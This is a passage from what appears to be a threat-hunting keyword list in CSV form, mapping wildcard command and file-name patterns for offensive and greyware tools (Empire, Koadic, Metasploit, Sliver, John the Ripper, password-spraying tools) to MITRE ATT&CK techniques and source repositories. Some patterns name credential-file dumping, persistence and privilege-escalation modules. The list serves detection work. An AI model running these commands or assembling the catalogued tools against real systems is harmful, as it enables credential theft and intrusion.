- T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*unshackle-main*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*unshackle-v1.0.iso*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*unshadow /etc/passwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*unshadow passwd shadow > *","greyware_tool_keyword","unshadow","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*unshadow passwd shadow*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*untested_payloads.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*UnwindInspector.exe*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" +"*Update-ExeFunctions*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*updog --*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*updog -d /*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. 
It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*updog -p *","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*updog-master.zip*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*upload-dll * *.dll*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*UploadFileImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*UrbanBishop.exe*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*ursnif_IcedID.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*USBPcap*","offensive_tool_keyword","usbpcap","USB capture for Windows.","T1115 - T1129 - T1052","TA0003 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" +"*use exploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*use implant/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*use incognito*","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*use powershell_stageless*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*use safetykatz*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*use stager/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*UseBeaconCmd*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*uselistener dbx*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - 
MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*uselistener onedrive*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*usemodule persistence/*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*usemodule powershell/persistence*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*usemodule privesc/*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*useplugin csharpserver*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - 
T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*UsePrtAdminAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*UsePrtImperonsationAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*user Inveigh*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*--user orbitaldump*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" +"*user_eq_pass_valid_cme_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory 
Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*--user_file*--password_file*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"*user_password.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*user_to_secretsdump.py*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*user|username|login|pass|password|pw|credentials*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*UserEnum*","offensive_tool_keyword","UserEnum","The three scripts provided here allow one to establish if a user exist on a Windows domain. without providing any authentication. These user enumeration scripts use the DsrGetDcNameEx2.CLDAP ping and NetBIOS MailSlot ping methods respectively to establish if any of the usernames in a provided text file exist on a remote domain controller.","T1210.001 - T1213 - T1071.001","TA0007 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/sensepost/UserEnum","1","1","N/A","N/A","3","209","45","2018-06-03T19:08:37Z","2018-05-21T16:55:58Z" +"*UserHunterImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
